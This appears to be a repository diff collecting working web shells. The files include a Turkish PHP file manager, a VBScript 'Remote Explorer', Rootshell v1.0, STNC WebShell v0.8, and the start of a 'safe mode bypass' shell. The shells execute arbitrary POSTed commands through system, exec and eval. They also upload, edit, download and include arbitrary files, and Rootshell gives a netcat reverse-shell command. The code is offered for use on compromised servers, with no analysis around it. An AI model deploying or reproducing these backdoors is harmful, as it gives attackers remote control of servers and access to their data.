+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>

php/RemExp.asp.php.txt

@@ -0,0 +1,250 @@
+<%@ Language=VBScript %>
+<%
+Option Explicit
+
+Dim giCount
+Dim gvAttributes
+
+Dim Ext
+
+Dim ScriptFolder
+Dim FolderPath
+
+Dim FileSystem
+Dim Drives
+Dim Drive
+Dim Folders
+Dim Folder
+Dim SubFolders
+Dim SubFolder
+Dim Files
+Dim File
+
+Dim BgColor, BackgroundColor,FSO
+
+If Request.QueryString("CopyFolder") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
+End If
+
+If Request.QueryString("CopyFile") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
+End If
+
+Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
+
+FolderPath = Request.QueryString("FolderPath")
+
+If FolderPath = "" Then
+ FolderPath = Request.ServerVariables("PATH_TRANSLATED")
+End If
+
+FolderPath = ParseFolder(FolderPath)
+
+ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
+
+%>
+<html>
+<head>
+<title>Remote Explorer</title>
+<style type="text/css">
+BODY
+{
+ BACKGROUND-COLOR: #C0C0C0
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+ MARGIN: 0px
+}
+td, input, select
+{
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+}
+.Address
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: 1px center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+.Go
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: left center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+</style>
+</head>
+<body bgcolor="#c0c0c0">
+<table width="100%" cellpadding="0" cellspacing="0" border="0">
+<tr>
+<form>
+<td width="1%" nowrap>   
+<select name="FolderPath" id="Drive">
+<%
+Set Drives = FileSystem.Drives
+For Each Drive In Drives
+ Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
+ If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
+  Response.Write ">"
+  Response.Write Drive.DriveLetter & " - "
+  If Drive.DriveType = "Remote" Then
+   Response.Write Drive.ShareName & " [share]"
+  ElseIf Drive.DriveLetter <> "A" Then
+   If Drive.IsReady Then
+    Response.Write Drive.VolumeName
+   Else
+    Response.Write "(Not Ready)"
+   End If
+  Else
+   Response.Write "(Skiped Detection)"
+  End If
+  Response.Write "</OPTION>"
+ Next
+%>
+</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
+</td>
+</form>
+<td width="1%">   Address: </td>
+<form>
+<td width="100%">
+<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
+</td>
+<td width="1%">
+<input class="Go" type="submit" value="Go"style="border:1px outset">
+</td>
+</form>
+</tr>
+</table>
+<%
+Set Folder = FileSystem.GetFolder(FolderPath)
+Set SubFolders = Folder.SubFolders
+Set Files = Folder.Files
+%>
+<br>
+<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
+<tr>
+<td width="40%" height="20" bgcolor="silver">  Name</td>
+<td width="10%" bgcolor="silver" align="right">Size    </td>
+<td width="20%" bgcolor="silver">Type </td>
+<td width="20%" bgcolor="silver">Modified </td>
+<td width="10%" bgcolor="silver" align="right">Attributes  </td>
+</tr>
+<%
+If Not Folder.IsRootFolder Then
+ BgToggle
+%>
+<tr title="Top Level">
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%BgToggle%>
+<tr>
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%
+End If
+For Each SubFolder In SubFolders
+ BgToggle
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%>  </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
+</tr>
+<%
+Next
+For Each File In Files
+ BgToggle
+ Ext = FileExtension(File.Name)
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte  </td>
+<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
+<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
+</tr>
+<%Next%>
+</table>
+</body>
+</html>
+<%
+Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
+    Dim lsResult
+    Dim llTemp
+    Dim giCount
+    MaxValuePerIndex = MaxValuePerIndex + 1
+    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
+        MinUpperBound = MinUpperBound + 1
+    Loop
+    For giCount = MinUpperBound To 0 Step -1
+        llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
+        lsResult = lsResult & CStr(llTemp)
+        If giCount > 0 Then lsResult = lsResult & IndexSeperator
+        SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
+    Next
+    ConvertBinary = lsResult
+End Function
+
+Private Sub BgToggle()
+ BackgroundColor = Not(BackgroundColor)
+ If BackgroundColor Then
+  BgColor = "#efefef"
+ Else
+  BgColor = "#ffffff"
+ End If
+End Sub
+
+Private Function Attributes(AttributeValue)
+ Dim lvAttributes
+ Dim lsResult
+ lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
+ If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
+ If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
+ If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
+ If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
+ Attributes = lsResult
+End Function
+
+Private Function FileExtension(FileName)
+ Dim lsExt
+ Dim liCount
+ For liCount = Len(FileName) To 1 Step -1
+  If Mid(FileName, liCount, 1) = "." Then
+   lsExt = Right(FileName, Len(FileName) - liCount)
+   Exit For
+  End If
+ Next
+ If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
+  lsExt = ""
+ End If
+ FileExtension = lsExt
+End Function
+
+Private Function ParseFolder(PathString)
+ Dim liCount
+ If Right(PathString, 1) = "\" Then
+  ParseFolder = PathString
+ Else
+  For liCount = Len(PathString) To 1 Step -1
+   If Mid(PathString, liCount, 1) = "\" Then
+    ParseFolder = Left(PathString, liCount)
+    Exit For
+   End If
+  Next
+ End If
+End Function
+%>
+

php/Rootshell.v.1.0.php

@@ -0,0 +1,246 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "Hacker";                                                       // Insert your nick
+$version      = "1.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+   print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        &nbsp;<p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div> 

php/STNC WebShell v0.8.php

@@ -0,0 +1,168 @@
+<?php
+$version = "0.8";
+$vsplit = "style=\"border-right: #000000 1px solid;\"";
+$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
+error_reporting(0);
+
+if(version_compare(phpversion(),"4.1.0") == -1)
+{ $_POST=&$HTTP_POST_VARS; }
+if(get_magic_quotes_gpc())
+foreach ($_POST as $k=>$v)
+{ $_POST[$k] = stripslashes($v); }
+
+/*
+$login='root';
+$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
+
+if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
+{
+header("HTTP/1.0 401 Unauthorized");
+header("WWW-Authenticate: Basic");
+die();
+}
+*/
+
+function fe($s)
+{return function_exists($s);}
+function cmd($s)
+{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
+elseif(fe("shell_exec"))$r=shell_exec($s);
+elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
+elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
+elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
+else $r=`$s`;return $r;}
+function safe_mode_is_on()
+{return ini_get('safe_mode');}
+function str100($s)
+{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
+function id()
+{return str100(cmd("id"));}
+function uname()
+{return str100(cmd("uname -a"));}
+
+function edit($size, $name, $val)
+{ return "<input type=text size=$size name=$name value=\"$val\">"; }
+function button($capt)
+{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
+function hidden($name, $val)
+{ return "<input type=hidden name=$name value=\"$val\">"; }
+function hidden_pwd()
+{ global $location; return hidden("pwd",$location);}
+
+$action_edit = false;
+
+$printline = "";
+
+if(isset($_POST["action"])) $action = $_POST["action"];
+else $action = "cmd";
+
+if(isset($_POST["pwd"]))
+{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
+
+$location = getcwd();
+
+if(($action === "download")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(file_exists($fname))
+  {
+    $pathinfo = pathinfo($fname);
+    header("Content-Transfer-Encoding: binary");
+    header("Content-type: application/x-download");
+    header("Content-Length: ".filesize($fname));
+    header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
+    readfile($fname);
+    die();
+  }
+  else
+    $printline = "\"$fname\" - download failed.";
+}
+
+echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
+textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
+scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
+scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
+td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
+.btn {background-color: #cfcfcf;} .pad {padding:5;}
+</style><title>  STNC WebShell v$version  </title></head><body><table width=100%>
+<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
+<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
+
+echo htmlspecialchars($printline)."\n";
+
+if($action === "cmd")
+{
+  if(isset($_POST["cmd"]))
+    $cmd = $_POST["cmd"];
+  else
+    $cmd = "ls -la";
+
+  $result = htmlspecialchars(cmd($cmd));
+
+  if($result === "")
+    $result = cmd("ls -la");
+
+  echo $result;
+  $location = getcwd();
+}
+elseif(($action === "edit")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  ob_start();
+
+  if(!readfile($fname))
+    echo "Cann't open file \"$fname\".";
+  else
+    $action_edit = true;
+
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
+{
+  $fname = $_POST["fname"];
+  $data = $_POST["data"];
+  $fid = fopen($fname, "w");
+  $fname = htmlspecialchars($fname);
+
+  if(!$fid)
+    echo "Cann't save file \"$fname\".";
+  else
+  {
+    fputs($fid, $data);
+    fclose($fid);
+    echo "File \"$fname\" is saved.";
+  }
+}
+elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(copy($_FILES["file"]["tmp_name"], $fname))
+    echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";      
+  else
+    echo "Upload failed!";
+}
+elseif(($action === "eval")&&(isset($_POST["code"])))
+{
+  $code = $_POST["code"];
+  ob_start();
+  eval($code);
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+
+echo "</textarea>".(($action_edit) ? "<br>".button("  Save  ").hidden("fname",$fname):"")."</center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button("    Edit    ")."</td></table></center></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
+  hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
+</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
+  hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
+</td></tr></table></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button("   Eval   ")."</center></td></form></tr>
+<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
+?>

php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php

@@ -0,0 +1,950 @@
+<?php 
+
+
+/*
+*****************************************************************************************
+*                           Safe0ver Shell //Safe Mod Bypass By Evilc0der                *
+***************************************************************************************** 
+*        Evilc0der.org is a Platform Which You can Publish Your Shell Script             *  
+
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
